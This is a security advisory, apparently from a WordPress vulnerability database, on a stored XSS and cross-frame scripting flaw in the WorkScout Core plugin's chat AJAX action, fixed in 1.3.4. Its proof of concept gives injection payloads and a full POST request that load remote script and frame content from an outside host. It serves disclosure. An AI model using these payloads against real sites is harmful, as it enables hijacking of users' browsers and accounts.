WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS
Description
The plugin, used by the WorkScout Theme did not sanitise the chat messages sent via the workscout_send_message_chat AJAX action, leading to Stored Cross-Site Scripting and Cross-Frame Scripting issues
Proof of Concept
Payloads: <!-->"><script src=https://m0ze.ru/payload/a.js></script> <!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html> POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://workscout.in/messages/?action=view&conv_id=163 Cookie: [user cookies] action=workscout_send_message_chat&recipient=3&conversation_id=163&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E
Affects Plugins
Fixed in version 1.3.4✓
Affects Themes
Fixed in version 2.0.33✓
Classification
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-08 (about 3 months ago)
Added
2021-04-08 (about 3 months ago)
Last Updated
2021-04-09 (about 3 months ago)